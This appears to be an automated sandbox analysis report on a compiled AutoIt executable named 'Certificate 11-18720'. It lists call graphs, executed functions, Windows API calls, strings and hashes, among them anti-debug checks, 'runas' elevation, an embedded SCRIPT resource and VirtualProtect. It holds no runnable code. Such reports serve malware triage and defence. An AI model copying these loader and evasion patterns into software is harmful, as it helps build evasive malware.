94780->94757 94782 5cd7f7 48 API calls 94781->94782 94783 61f0c0 94782->94783 94784 5cd7f7 48 API calls 94783->94784 94785 61f0c8 94784->94785 94786 5cd7f7 48 API calls 94785->94786 94787 61f0d0 94786->94787 94788 5c936c 81 API calls 94787->94788 94811 61f0de 94788->94811 94789 5c6a63 48 API calls 94789->94811 94790 61f2cc 94791 61f2f9 Mailbox 94790->94791 94931 5c6b68 48 API calls 94790->94931 94791->94757 94793 61f2b3 94797 5c518c 48 API calls 94793->94797 94794 5cc799 48 API calls 94794->94811 94795 61f2ce 94799 5c518c 48 API calls 94795->94799 94796 5c6eed 48 API calls 94796->94811 94798 61f2c0 94797->94798 94802 5c510d 48 API calls 94798->94802 94800 61f2dd 94799->94800 94803 5c510d 48 API calls 94800->94803 94801 5cbdfa 48 API calls 94805 61f175 CharUpperBuffW 94801->94805 94802->94790 94803->94790 94804 5cbdfa 48 API calls 94806 61f23a CharUpperBuffW 94804->94806 94807 5cd645 53 API calls 94805->94807 94930 5dd922 55 API calls 2 library calls 94806->94930 94807->94811 94809 5c936c 81 API calls 94809->94811 94810 5c510d 48 API calls 94810->94811 94811->94789 94811->94790 94811->94791 94811->94793 94811->94794 94811->94795 94811->94796 94811->94801 94811->94804 94811->94809 94811->94810 94812 5c518c 48 API calls 94811->94812 94812->94811 94814 60a6fb 94813->94814 94815 5df4ea 48 API calls 94814->94815 94816 60a709 94815->94816 94817 60a717 94816->94817 94818 5cd7f7 48 API calls 94816->94818 94817->94757 94818->94817 94819->94762 94820->94762 94821->94757 94822->94765 94823->94735 94824->94765 94825->94765 94826->94755 94827->94747 94828->94766 94830 5c936c 81 API calls 94829->94830 94831 61f8ea 94830->94831 94833 61f92c Mailbox 94831->94833 94865 620567 94831->94865 94833->94777 94834 61fb8b 94835 61fcfa 94834->94835 94838 61fb95 94834->94838 94913 620688 89 API calls Mailbox 94835->94913 94878 61f70a 94838->94878 94839 61fd07 94839->94838 94841 61fd13 94839->94841 94840 5c936c 81 API calls 94858 61f984 Mailbox 94840->94858 94841->94833 94846 61fbc9 94892 5ded18 94846->94892 94849 61fbe3 94911 60cc5c 86 API calls 4 library calls 94849->94911 94850 61fbfd 94852 5dc050 48 API calls 94850->94852 94854 61fc14 94852->94854 94853 61fbee GetCurrentProcess TerminateProcess 94853->94850 94855 5d1b90 48 API calls 94854->94855 94864 61fc3e 94854->94864 94857 61fc2d 94855->94857 94856 61fd65 94856->94833 94861 61fd7e FreeLibrary 94856->94861 94859 62040f 105 API calls 94857->94859 94858->94833 94858->94834 94858->94840 94858->94858 94909 6229e8 48 API calls ___crtGetEnvironmentStringsW 94858->94909 94910 61fda5 60 API calls 2 library calls 94858->94910 94859->94864 94860 5d1b90 48 API calls 94860->94864 94861->94833 94864->94856 94864->94860 94896 62040f 94864->94896 94912 5cdcae 50 API calls Mailbox 94864->94912 94866 5cbdfa 48 API calls 94865->94866 94867 620582 CharLowerBuffW 94866->94867 94914 601f11 94867->94914 94871 5cd7f7 48 API calls 94872 6205bb 94871->94872 94921 5c69e9 48 API calls ___crtGetEnvironmentStringsW 94872->94921 94874 6205d2 94875 5cb18b 48 API calls 94874->94875 94876 6205de Mailbox 94875->94876 94877 62061a Mailbox 94876->94877 94922 61fda5 60 API calls 2 library calls 94876->94922 94877->94858 94879 61f725 94878->94879 94883 61f77a 94878->94883 94880 5df4ea 48 API calls 94879->94880 94881 61f747 94880->94881 94882 5df4ea 48 API calls 94881->94882 94881->94883 94882->94881 94884 620828 94883->94884 94885 620a53 Mailbox 94884->94885 94891 62084b _strcat _wcscpy __NMSG_WRITE 94884->94891 94885->94846 94886 5cd286 48 API calls 94886->94891 94887 5ccf93 58 API calls 94887->94891 94888 5c936c 81 API calls 94888->94891 94889 5e395c 47 API calls _W_store_winword 94889->94891 94891->94885 94891->94886 94891->94887 94891->94888 94891->94889 94925 608035 50 API calls __NMSG_WRITE 94891->94925 94893 5ded2d 94892->94893 94894 5dedc5 VirtualProtect 94893->94894 94895 5ded93 94893->94895 94894->94895 94895->94849 94895->94850 94897 620427 94896->94897 94903 620443 94896->94903 94898 6204f8 94897->94898 94899 62042e 94897->94899 94900 62044f 94897->94900 94897->94903 94929 609dc5 103 API calls 94898->94929 94926 607c56 50 API calls _strlen 94899->94926 94928 5ccdb9 48 API calls 94900->94928 94901 62051e 94901->94864 94903->94901 94906 5e1c9d _free 47 API calls 94903->94906 94906->94901 94907 620438 94927 5ccdb9 48 API calls 94907->94927 94909->94858 94910->94858 94911->94853 94912->94864 94913->94839 94916 601f3b __NMSG_WRITE 94914->94916 94915 601f79 94915->94871 94915->94876 94916->94915 94917 601f6f 94916->94917 94920 601ffa 94916->94920 94917->94915 94923 5dd37a 60 API calls 94917->94923 94920->94915 94924 5dd37a 60 API calls 94920->94924 94921->94874 94922->94877 94923->94917 94924->94920 94925->94891 94926->94907 94927->94903 94928->94903 94929->94903 94930->94811 94931->94791

                                                                                    Executed Functions

                                                                                    Function 005EB043 Relevance: 21.5, APIs: 14, Instructions: 537COMMONLIBRARYCODE
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 643 5eb043-5eb080 call 5ef8a0 646 5eb089-5eb08b 643->646 647 5eb082-5eb084 643->647 649 5eb0ac-5eb0d9 646->649 650 5eb08d-5eb0a7 call 5e7bda call 5e7c0e call 5e6e10 646->650 648 5eb860-5eb86c call 5ea70c 647->648 653 5eb0db-5eb0de 649->653 654 5eb0e0-5eb0e7 649->654 650->648 653->654 657 5eb10b-5eb110 653->657 658 5eb0e9-5eb100 call 5e7bda call 5e7c0e call 5e6e10 654->658 659 5eb105 654->659 661 5eb11f-5eb12d call 5f3bf2 657->661 662 5eb112-5eb11c call 5ef82f 657->662 688 5eb851-5eb854 658->688 659->657 674 5eb44b-5eb45d 661->674 675 5eb133-5eb145 661->675 662->661 678 5eb7b8-5eb7d5 WriteFile 674->678 679 5eb463-5eb473 674->679 675->674 677 5eb14b-5eb183 call 5e7a0d GetConsoleMode 675->677 677->674 693 5eb189-5eb18f 677->693 683 5eb7d7-5eb7df 678->683 684 5eb7e1-5eb7e7 GetLastError 678->684 680 5eb55a-5eb55f 679->680 681 5eb479-5eb484 679->681 690 5eb565-5eb56e 680->690 691 5eb663-5eb66e 680->691 686 5eb48a-5eb49a 681->686 687 5eb81b-5eb833 681->687 689 5eb7e9 683->689 684->689 694 5eb4a0-5eb4a3 686->694 695 5eb83e-5eb84e call 5e7c0e call 5e7bda 687->695 696 5eb835-5eb838 687->696 700 5eb85e-5eb85f 688->700 698 5eb7ef-5eb7f1 689->698 690->687 699 5eb574 690->699 691->687 697 5eb674 691->697 701 5eb199-5eb1bc GetConsoleCP 693->701 702 5eb191-5eb193 693->702 703 5eb4e9-5eb520 WriteFile 694->703 704 5eb4a5-5eb4be 694->704 695->688 696->695 705 5eb83a-5eb83c 696->705 706 5eb67e-5eb693 697->706 708 5eb856-5eb85c 698->708 709 5eb7f3-5eb7f5 698->709 710 5eb57e-5eb595 699->710 700->648 711 5eb1c2-5eb1ca 701->711 712 5eb440-5eb446 701->712 702->674 702->701 703->684 715 5eb526-5eb538 703->715 713 5eb4cb-5eb4e7 704->713 714 5eb4c0-5eb4ca 704->714 705->700 716 5eb699-5eb69b 706->716 708->700 709->687 718 5eb7f7-5eb7fc 709->718 719 5eb59b-5eb59e 710->719 720 5eb1d4-5eb1d6 711->720 712->709 713->694 713->703 714->713 715->698 721 5eb53e-5eb54f 715->721 722 5eb69d-5eb6b3 716->722 723 5eb6d8-5eb719 WideCharToMultiByte 716->723 725 5eb7fe-5eb810 call 5e7c0e call 5e7bda 718->725 726 5eb812-5eb819 call 5e7bed 718->726 727 5eb5de-5eb627 WriteFile 719->727 728 5eb5a0-5eb5b6 719->728 733 5eb1dc-5eb1fe 720->733 734 5eb36b-5eb36e 720->734 721->686 735 5eb555 721->735 736 5eb6c7-5eb6d6 722->736 737 5eb6b5-5eb6c4 722->737 723->684 739 5eb71f-5eb721 723->739 725->688 726->688 727->684 732 5eb62d-5eb645 727->732 729 5eb5cd-5eb5dc 728->729 730 5eb5b8-5eb5ca 728->730 729->719 729->727 730->729 732->698 742 5eb64b-5eb658 732->742 743 5eb217-5eb223 call 5e1688 733->743 744 5eb200-5eb215 733->744 745 5eb375-5eb3a2 734->745 746 5eb370-5eb373 734->746 735->698 736->716 736->723 737->736 747 5eb727-5eb75a WriteFile 739->747 742->710 752 5eb65e 742->752 767 5eb269-5eb26b 743->767 768 5eb225-5eb239 743->768 753 5eb271-5eb283 call 5f40f7 744->753 755 5eb3a8-5eb3ab 745->755 746->745 746->755 749 5eb75c-5eb776 747->749 750 5eb77a-5eb78e GetLastError 747->750 749->747 756 5eb778 749->756 759 5eb794-5eb796 750->759 752->698 770 5eb289 753->770 771 5eb435-5eb43b 753->771 761 5eb3ad-5eb3b0 755->761 762 5eb3b2-5eb3c5 call 5f5884 755->762 756->759 759->689 766 5eb798-5eb7b0 759->766 761->762 763 5eb407-5eb40a 761->763 762->684 776 5eb3cb-5eb3d5 762->776 763->720 773 5eb410 763->773 766->706 772 5eb7b6 766->772 767->753 774 5eb23f-5eb254 call 5f40f7 768->774 775 5eb412-5eb42d 768->775 777 5eb28f-5eb2c4 WideCharToMultiByte 770->777 771->689 772->698 773->771 774->771 785 5eb25a-5eb267 774->785 775->771 779 5eb3fb-5eb401 776->779 780 5eb3d7-5eb3ee call 5f5884 776->780 777->771 781 5eb2ca-5eb2f0 WriteFile 777->781 779->763 780->684 788 5eb3f4-5eb3f5 780->788 781->684 784 5eb2f6-5eb30e 781->784 784->771 787 5eb314-5eb31b 784->787 785->777 787->779 789 5eb321-5eb34c WriteFile 787->789 788->779 789->684 790 5eb352-5eb359 789->790 790->771 791 5eb35f-5eb366 790->791 791->779
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4d4da835d63964f8ab9d7abcc1d7aafe8d435339d8f35dbe5ca03aefd96896cd
                                                                                    • Instruction ID: 02198267bdec78838112f17985e3b80bbce3d61de20577e7c6e2ba67d4639314
                                                                                    • Opcode Fuzzy Hash: 4d4da835d63964f8ab9d7abcc1d7aafe8d435339d8f35dbe5ca03aefd96896cd
                                                                                    • Instruction Fuzzy Hash: A1329F75B022698BEB28CF15DC856EABBB5FF46311F0441D9E44AE7A81D7309E80CF52
                                                                                    Function 005C3D19 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 151windowCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,005C3AA3,?), ref: 005C3D45
                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,005C3AA3,?), ref: 005C3D57
                                                                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,00681148,00681130,?,?,?,?,005C3AA3,?), ref: 005C3DC8
                                                                                      • Part of subcall function 005C6430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,005C3DEE,00681148,?,?,?,?,?,005C3AA3,?), ref: 005C6471
                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,005C3AA3,?), ref: 005C3E48
                                                                                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,006728F4,00000010), ref: 00631CCE
                                                                                    • SetCurrentDirectoryW.KERNEL32(?,00681148,?,?,?,?,?,005C3AA3,?), ref: 00631D06
                                                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0065DAB4,00681148,?,?,?,?,?,005C3AA3,?), ref: 00631D89
                                                                                    • ShellExecuteW.SHELL32(00000000,?,?,?,?,005C3AA3), ref: 00631D90
                                                                                      • Part of subcall function 005C3E6E: GetSysColorBrush.USER32(0000000F), ref: 005C3E79
                                                                                      • Part of subcall function 005C3E6E: LoadCursorW.USER32(00000000,00007F00), ref: 005C3E88
                                                                                      • Part of subcall function 005C3E6E: LoadIconW.USER32(00000063), ref: 005C3E9E
                                                                                      • Part of subcall function 005C3E6E: LoadIconW.USER32(000000A4), ref: 005C3EB0
                                                                                      • Part of subcall function 005C3E6E: LoadIconW.USER32(000000A2), ref: 005C3EC2
                                                                                      • Part of subcall function 005C3E6E: RegisterClassExW.USER32(?), ref: 005C3F30
                                                                                      • Part of subcall function 005C36B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 005C36E6
                                                                                      • Part of subcall function 005C36B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 005C3707
                                                                                      • Part of subcall function 005C36B8: ShowWindow.USER32(00000000,?,?,?,?,005C3AA3,?), ref: 005C371B
                                                                                      • Part of subcall function 005C36B8: ShowWindow.USER32(00000000,?,?,?,?,005C3AA3,?), ref: 005C3724
                                                                                      • Part of subcall function 005C4FFC: _memset.LIBCMT ref: 005C5022
                                                                                      • Part of subcall function 005C4FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 005C50CB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                                    • String ID: ()g$This is a third-party compiled AutoIt script.$runas
                                                                                    • API String ID: 438480954-2924012712
                                                                                    • Opcode ID: 1e51c79abead282f97953a5c738d7cc54b7fa6ab1e199631d885522b7b5d75cf
                                                                                    • Instruction ID: 8b7a3d29f54d6711535ccbec9867663424e9a7e144952496c2251fc3318af69c
                                                                                    • Opcode Fuzzy Hash: 1e51c79abead282f97953a5c738d7cc54b7fa6ab1e199631d885522b7b5d75cf
                                                                                    • Instruction Fuzzy Hash: 8851E330A0424ABECB11ABF0DC59FEE7F7FBB46704F00916DF2416A192DA645646CB21
                                                                                    Function 005DDDC0 Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1075 5dddc0-5dde4f call 5cd7f7 GetVersionExW call 5c6a63 call 5ddfb4 call 5c6571 1084 5dde55-5dde56 1075->1084 1085 6324c8-6324cb 1075->1085 1086 5dde58-5dde63 1084->1086 1087 5dde92-5ddea2 call 5ddf77 1084->1087 1088 6324e4-6324e8 1085->1088 1089 6324cd 1085->1089 1092 5dde69-5dde6b 1086->1092 1093 63244e-632454 1086->1093 1106 5ddea4-5ddec1 GetCurrentProcess call 5ddf5f 1087->1106 1107 5ddec7-5ddee1 1087->1107 1090 6324d3-6324dc 1088->1090 1091 6324ea-6324f3 1088->1091 1095 6324d0 1089->1095 1090->1088 1091->1095 1098 6324f5-6324f8 1091->1098 1099 632469-632475 1092->1099 1100 5dde71-5dde74 1092->1100 1096 632456-632459 1093->1096 1097 63245e-632464 1093->1097 1095->1090 1096->1087 1097->1087 1098->1090 1102 632477-63247a 1099->1102 1103 63247f-632485 1099->1103 1104 632495-632498 1100->1104 1105 5dde7a-5dde89 1100->1105 1102->1087 1103->1087 1104->1087 1110 63249e-6324b3 1104->1110 1111 5dde8f 1105->1111 1112 63248a-632490 1105->1112 1106->1107 1126 5ddec3 1106->1126 1108 5ddf31-5ddf3b GetSystemInfo 1107->1108 1109 5ddee3-5ddef7 call 5de00c 1107->1109 1115 5ddf0e-5ddf1a 1108->1115 1123 5ddf29-5ddf2f GetSystemInfo 1109->1123 1124 5ddef9-5ddf01 call 5ddff4 GetNativeSystemInfo 1109->1124 1117 6324b5-6324b8 1110->1117 1118 6324bd-6324c3 1110->1118 1111->1087 1112->1087 1120 5ddf1c-5ddf1f FreeLibrary 1115->1120 1121 5ddf21-5ddf26 1115->1121 1117->1087 1118->1087 1120->1121 1125 5ddf03-5ddf07 1123->1125 1124->1125 1125->1115 1129 5ddf09-5ddf0c FreeLibrary 1125->1129 1126->1107 1129->1115
                                                                                    APIs
                                                                                    • GetVersionExW.KERNEL32(?), ref: 005DDDEC
                                                                                    • GetCurrentProcess.KERNEL32(00000000,0065DC38,?,?), ref: 005DDEAC
                                                                                    • GetNativeSystemInfo.KERNELBASE(?,0065DC38,?,?), ref: 005DDF01
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 005DDF0C
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 005DDF1F
                                                                                    • GetSystemInfo.KERNEL32(?,0065DC38,?,?), ref: 005DDF29
                                                                                    • GetSystemInfo.KERNEL32(?,0065DC38,?,?), ref: 005DDF35
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                                                    • String ID:
                                                                                    • API String ID: 3851250370-0
                                                                                    • Opcode ID: d1225d6d56d5fb3f268a941af432883e1da897798556a3a277f24ef8eeac532d
                                                                                    • Instruction ID: 4bda46c1b72e85e247da845c8375ce42b44f540fe538564988c239a5de8977dd
                                                                                    • Opcode Fuzzy Hash: d1225d6d56d5fb3f268a941af432883e1da897798556a3a277f24ef8eeac532d
                                                                                    • Instruction Fuzzy Hash: 6561AEB180A285CBCF25CF68D8C15E97FB5BF2A300F1989DAD8459F307C624C949CB65
                                                                                    Function 005C406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1147 5c406b-5c4083 CreateStreamOnHGlobal 1148 5c4085-5c409c FindResourceExW 1147->1148 1149 5c40a3-5c40a6 1147->1149 1150 634f16-634f25 LoadResource 1148->1150 1151 5c40a2 1148->1151 1150->1151 1152 634f2b-634f39 SizeofResource 1150->1152 1151->1149 1152->1151 1153 634f3f-634f4a LockResource 1152->1153 1153->1151 1154 634f50-634f6e 1153->1154 1154->1151
                                                                                    APIs
                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,005C449E,?,?,00000000,00000001), ref: 005C407B
                                                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,005C449E,?,?,00000000,00000001), ref: 005C4092
                                                                                    • LoadResource.KERNEL32(?,00000000,?,?,005C449E,?,?,00000000,00000001,?,?,?,?,?,?,005C41FB), ref: 00634F1A
                                                                                    • SizeofResource.KERNEL32(?,00000000,?,?,005C449E,?,?,00000000,00000001,?,?,?,?,?,?,005C41FB), ref: 00634F2F
                                                                                    • LockResource.KERNEL32(005C449E,?,?,005C449E,?,?,00000000,00000001,?,?,?,?,?,?,005C41FB,00000000), ref: 00634F42
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                    • String ID: SCRIPT
                                                                                    • API String ID: 3051347437-3967369404
                                                                                    • Opcode ID: 994703e7fc080d04bdb79207a2db2f4cc7951e892d85532dd8f35bd1e108257f
                                                                                    • Instruction ID: e1cca5adb18c2fcacfae2f5a0a284db1f97a5cd7c634e25fd894d35c0d3f4933
                                                                                    • Opcode Fuzzy Hash: 994703e7fc080d04bdb79207a2db2f4cc7951e892d85532dd8f35bd1e108257f
                                                                                    • Instruction Fuzzy Hash: A2118E74640701BFE7218B65EC48F677BBAFBC6B51F10412CF6029A2A0DBB1DC00CA20
                                                                                    Function 005D3B70 Relevance: 5.9, Strings: 4, Instructions: 903COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Exception@8Throwstd::exception::exception
                                                                                    • String ID: @$ h$ h$ h
                                                                                    • API String ID: 3728558374-1248899527
                                                                                    • Opcode ID: 32892553f0a22f19b59a1c8e078661eca451ea2adc65a73f6f01d15bb9ee66ab
                                                                                    • Instruction ID: e0cd227443250787e38023bb9c9359c0c5d6894bbf29b5d2fa40443a315a406c
                                                                                    • Opcode Fuzzy Hash: 32892553f0a22f19b59a1c8e078661eca451ea2adc65a73f6f01d15bb9ee66ab
                                                                                    • Instruction Fuzzy Hash: BC72A074D0420A9FDF24DF98C485AAEBBB6FF48300F14805BE905AB391D775AE45CB92
                                                                                    Function 00606CA9 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNELBASE(?,00632F49), ref: 00606CB9
                                                                                    • FindFirstFileW.KERNELBASE(?,?), ref: 00606CCA
                                                                                    • FindClose.KERNEL32(00000000), ref: 00606CDA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFind$AttributesCloseFirst
                                                                                    • String ID:
                                                                                    • API String ID: 48322524-0
                                                                                    • Opcode ID: 441376e8c35d783891147436009cf01629941bb0b2fde610d18158ec8f9f3db9
                                                                                    • Instruction ID: b951749c9758d4dc734da9a8f1c3163891e2eac1f2b17d9d7784f00a97b3d6d7
                                                                                    • Opcode Fuzzy Hash: 441376e8c35d783891147436009cf01629941bb0b2fde610d18158ec8f9f3db9
                                                                                    • Instruction Fuzzy Hash: F6E0D835C1041057D3186738EC0D4EA37AEDA06339F100709F971C22D0E770D91045D5
                                                                                    Function 005D3200 Relevance: 2.2, Strings: 1, Instructions: 986COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharUpper
                                                                                    • String ID: h
                                                                                    • API String ID: 3964851224-853301588
                                                                                    • Opcode ID: b61484ae28ce4e9d67c57157f26a10714df29992a4963c75769b6564c57b59f9
                                                                                    • Instruction ID: d5c39f3c1324a88706c661a58b0100ea312c25d8715ad161e3438e8b30f23e49
                                                                                    • Opcode Fuzzy Hash: b61484ae28ce4e9d67c57157f26a10714df29992a4963c75769b6564c57b59f9
                                                                                    • Instruction Fuzzy Hash: AA925A706083419FD724DF18C484B6ABBE1FF88304F14896EE99A8B362D771ED45CB92
                                                                                    Function 005CE8D0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 816windowsleeptimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005CE959
                                                                                    • timeGetTime.WINMM ref: 005CEBFA
                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005CED2E
                                                                                    • TranslateMessage.USER32(?), ref: 005CED3F
                                                                                    • DispatchMessageW.USER32(?), ref: 005CED4A
                                                                                    • LockWindowUpdate.USER32(00000000), ref: 005CED79
                                                                                    • DestroyWindow.USER32 ref: 005CED85
                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 005CED9F
                                                                                    • Sleep.KERNEL32(0000000A), ref: 00635270
                                                                                    • TranslateMessage.USER32(?), ref: 006359F7
                                                                                    • DispatchMessageW.USER32(?), ref: 00635A05
                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00635A19
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
